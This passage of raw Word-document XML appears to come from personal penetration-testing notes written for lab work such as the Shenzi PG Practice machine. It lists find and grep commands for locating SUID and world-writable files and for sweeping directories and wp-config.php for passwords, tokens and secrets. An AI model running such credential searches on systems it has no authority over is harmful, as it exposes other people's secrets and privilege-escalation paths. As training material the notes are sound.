    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001467">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Files by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001468">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -name "*.php" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001469">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searching for Files by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -size +100M 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -size -10k 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding files by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user or group permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -user root -name "*.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -o+w 2&gt;/dev/null   # World-writable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 2&gt;/dev/null  # SUID files (potential privilege escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001470">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hidden </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files or directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001471">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -name ".*" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding files with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -exec grep -l "password" {} 2&gt;/dev/null \;</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for Readable Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001477">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find files that are owned by the current user and readable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001478">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1374"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find /home /tmp /var -type f -user $(whoami) -readable 2&gt;/dev/null</w:t>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7B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wczmvlevqptl" w:id="173"/>
      <w:bookmarkEnd w:id="173"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rinE '(password|username|user|pass|key|token|secret|admin|login|credentials)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000147E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searches recursively through current directory for key words</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000147F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command is really useful for looking through something like a directory of FTP or SMB files for useful information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001480">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId389">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shenzi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001481">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r : Recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i : Ignore case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001483">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n : Line numbers: Shows the line number in the file where the match occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001484">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-E : Use Extended Regular Expressions (ERE), which allows more powerful regex patterns like | (alternation/or), +, {}, etc., without needing to escape them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001485">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001486">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001487">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursively search directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -r "password" /path/to/dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001489">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful flags:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ignore case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: show line numbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: limit to specific file types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep 'pattern' --include="*.txt" ./*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-dir</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: skip specific directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001490">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rn --exclude-dir="node_modules" "password" .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001491">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001492">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look through file for "password" case in-sensitive:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="844"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -ni "password" filename.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001494">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001495">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001496">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -Rin password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp-config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"R" is for recursive but this is just a file so idk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001498">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are looking for "password" in wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001499">
      <w:pPr>
